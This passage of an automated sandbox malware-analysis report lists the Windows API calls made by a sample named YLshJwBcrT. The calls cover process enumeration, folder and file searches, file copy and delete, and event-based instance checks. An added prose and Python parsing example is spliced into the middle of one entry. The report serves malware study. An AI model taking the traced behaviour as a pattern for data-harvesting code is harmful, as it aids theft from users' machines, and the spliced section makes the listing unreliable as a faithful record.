                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                  • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • CloseHandle.KERNEL32(?), ref: 00418761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  APIs
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                  • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                  • lstrcatA.KERNEL32(?,00883520), ref: 00414FAB
                                  • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                  • wsprintfA.USER32 ref: 00418850
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 2716131235-2206825331
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcessstrtok_s
                                  • String ID:
                                  • API String ID: 3407564107-0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022F7C17
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F7C1E
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022F7C2B
                                  • wsprintfA.USER32 ref: 022F7C5A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction ID: 55b915544e306526a7f24f824c9259a5c326e43306ee120ffebf3e302949d2a3
                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction Fuzzy Hash: 461127B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D2795940CBB1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                  • wsprintfA.USER32 ref: 004179F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 1243822799-0
                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022F7CCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F7CD1
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022F7CE4
                                  • wsprintfA.USER32 ref: 022F7D1E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction ID: bf295138270c4cc69baab17ac4a5d8d362901366e9326c417245979d569bef1b
                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction Fuzzy Hash: 93113CB1A45218EBEB248F94DD49FA9F7B8FB05721F1043AAF61AA32C0C77459408B51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s
                                  • String ID:
                                  • API String ID: 3330995566-0
                                  • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                  • Instruction ID: 3903c414c8317c720e5190a219f0d88bad3482c58d54c9ec0353ddc74ca36816
                                  • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                  • Instruction Fuzzy Hash: 00115AB0E1020AEFCB14CFE6D848BEEB7B5FB04704F00C028E525A6254D7789500CF54
                                  APIs
                                  • CreateFileA.KERNEL32(022F3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022F3D55,?), ref: 022F9563
                                  • GetFileSizeEx.KERNEL32(000000FF,022F3D55), ref: 022F9580
                                  • CloseHandle.KERNEL32(000000FF), ref: 022F958E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction ID: 75cb15518caf11755f34c3d1d7ad2f19003ac83350c760d849f3d7a93ac02722
                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction Fuzzy Hash: A2F0AF39E50208BBDB60DFF0DC49B9EB7BAEB49310F10C264FA11A7284D63596418B40
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D31
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022F6D4F
                                  • CloseHandle.KERNEL32(00000000), ref: 022F6D60
                                  • Sleep.KERNEL32(00001770), ref: 022F6D6B
                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D81
                                  • ExitProcess.KERNEL32 ref: 022F6D89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                  • Instruction ID: a436c3b8b3d6e45c776222cd66e80b7e4a486e22324e16c618ce5a4eb0828588
                                  • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                  • Instruction Fuzzy Hash: 19F05E7A9A030AAEF790ABE1DC08BBDB67AEB05741F101538F722A5194CBB04500CA56
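The API reference lines in this listing (and the "Part of subcall function" lines that appear in other entries) are easier to triage once parsed into structured records. The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses the listing format, decodes the hex arguments (so that Sleep's 00001770 reads as 6000 ms and OpenEventA's 001F0003 as EVENT_ALL_ACCESS), and checks for the OpenEventA, CreateEventA, Sleep, ExitProcess ordering shown above, which an analyst would read as a check for an already-running instance. That reading is an interpretation, not something the report states. The sample lines are copied from the function at 022F6D31 plus one subcall line from 00418DE0; the regex, helper names and the "guard" label are assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: API reference lines in the Joe Sandbox IDA-plugin
# listing format, copied from the function at 022F6D31 and one subcall line.
SAMPLE_LINES = """
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D31
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022F6D4F
• CloseHandle.KERNEL32(00000000), ref: 022F6D60
• Sleep.KERNEL32(00001770), ref: 022F6D6B
• CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D81
• ExitProcess.KERNEL32 ref: 022F6D89
  • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
"""

# One listing line: optional "Part of subcall function ADDR:", then
# API.MODULE, optional (args), then "ref: ADDR". Parenthesis-less forms
# such as "ExitProcess.KERNEL32 ref: ..." are accepted too.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

EVENT_ALL_ACCESS = 0x1F0003  # STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x3


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the listing shows '?'
    ref: int                    # call-site address from "ref:"
    subcall_of: Optional[int]   # function address for "Part of subcall" lines


def parse_args(text: Optional[str]) -> List[Optional[int]]:
    """Decode the comma-separated hex argument list; '?' means unknown."""
    if text is None or text.strip() == "":
        return []
    out: List[Optional[int]] = []
    for tok in text.split(","):
        tok = tok.strip()
        out.append(None if tok == "?" else int(tok, 16))
    return out


def parse_listing(text: str) -> List[ApiCall]:
    """Turn listing lines into ApiCall records, skipping non-matching lines."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        calls.append(ApiCall(
            api=m["api"],
            module=m["module"],
            args=parse_args(m["args"]),
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def contains_sequence(calls: List[ApiCall], apis: List[str]) -> bool:
    """True if the named APIs occur in this order among the function's own
    (non-subcall) calls; other calls may sit in between."""
    it = iter(c.api for c in calls if c.subcall_of is None)
    return all(name in it for name in apis)


def sleep_ms(calls: List[ApiCall]) -> List[int]:
    """Decoded millisecond arguments of every Sleep call with a known value."""
    return [c.args[0] for c in calls
            if c.api == "Sleep" and c.args and c.args[0] is not None]


def running_instance_guard(calls: List[ApiCall]) -> Optional[dict]:
    """Heuristic (analyst interpretation, not from the report): open a named
    event, otherwise create it, pause, then exit. Returns details or None."""
    seq = ["OpenEventA", "CreateEventA", "Sleep", "ExitProcess"]
    if not contains_sequence(calls, seq):
        return None
    opens = [c for c in calls if c.api == "OpenEventA"]
    return {
        "open_access": opens[0].args[0],
        "open_is_all_access": opens[0].args[0] == EVENT_ALL_ACCESS,
        "sleep_ms": sleep_ms(calls),
        "call_sites": [hex(c.ref) for c in calls if c.api in seq],
    }


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LINES)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} args={c.args} sub={c.subcall_of}")
    print(running_instance_guard(parsed))
```

The subsequence check deliberately ignores "Part of subcall function" lines, since those belong to callees and would otherwise make unrelated functions match; relax that filter if you want to search across a whole listing rather than one function entry.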
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: `o@
                                  • API String ID: 0-590292170
                                  • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                  • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                  • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                  • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                  APIs
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                  • lstrcatA.KERNEL32(?,0088B1C8), ref: 00414C08
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0088C588,?,000003E8), ref: 00414A4A
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: UaA
                                  • API String ID: 2104210347-3893042857
                                  • Opcode ID: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                  • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                  • Opcode Fuzzy Hash: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                  • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SystemTimelstrcpy
                                  • String ID: cI@$cI@
                                  • API String ID: 62757014-1697673767
                                  • Opcode ID: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                  • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                  • Opcode Fuzzy Hash: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                  • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                  APIs
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                  • lstrcatA.KERNEL32(?,0088A510), ref: 004150A8
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                  • String ID: aA
                                  • API String ID: 2699682494-2567749500
                                  • Opcode ID: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                  • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                  • Opcode Fuzzy Hash: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                  • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                  • lstrlen.KERNEL32(00000000), ref: 022EBF06
                                    • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                                  • StrStrA.SHLWAPI(00000000,004213E0), ref: 022EBF34
                                  • lstrlen.KERNEL32(00000000), ref: 022EC00C
                                  • lstrlen.KERNEL32(00000000), ref: 022EC020
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                  • String ID:
                                  • API String ID: 1440504306-0
                                  • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                  • Instruction ID: ed0e95bb81ccccef142ad951170bc854fc1dcf4b76684e0a1d3483a209fd5269
                                  • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                  • Instruction Fuzzy Hash: 2EB11F71920318ABDF58FBE4DD95EEDB33AAF64304F404169E60A62194EF346B48CF61
                                  APIs
                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFileNextlstrcat
                                  • String ID: !=A
                                  • API String ID: 3840410801-2919091325
                                  • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                  • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                  • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                  • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                  APIs
                                    • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022F51E1
                                  • lstrcat.KERNEL32(?,00421070), ref: 022F51FE
                                  • lstrcat.KERNEL32(?,0064A5F8), ref: 022F5212
                                  • lstrcat.KERNEL32(?,00421074), ref: 022F5224
                                    • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4B93
                                    • Part of subcall function 022F4B77: FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                                    • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                    • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                    • Part of subcall function 022F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                    • Part of subcall function 022F4B77: FindClose.KERNEL32(000000FF), ref: 022F4DF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                  • Instruction ID: 0bdaea05ca655ead524e857089f944e132c0aa86f526c94539ba6166496cc295
                                  • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                  • Instruction Fuzzy Hash: 8F21B67AA503087BC754FBE0DC45EE9737AAB55700F404198B64992184DE749AC9CFA2
                                  APIs
                                  Memory Dump Source
